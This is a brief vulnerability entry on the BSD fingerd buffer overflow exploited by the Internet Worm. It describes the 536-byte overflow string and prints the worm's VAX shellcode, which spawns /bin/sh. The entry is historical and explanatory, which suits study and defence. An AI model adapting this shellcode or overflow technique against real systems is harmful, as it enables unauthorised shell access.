|
|
BSD fingerd buffer overflow Vulnerability
The Internet Worm used a string of 536 bytes to overflow the input buffer of fingerd on the VAX. The VAX machine code it used was: pushl $68732f 'sh\0' pushl $6e69622f '/bin' movl sp, r10 pushl $0 pushl $0 pushl r10 pushl $3 movl sp, ap chmk $3b This code executed execve("/bin/sh", 0, 0). |
|
Privacy Statement |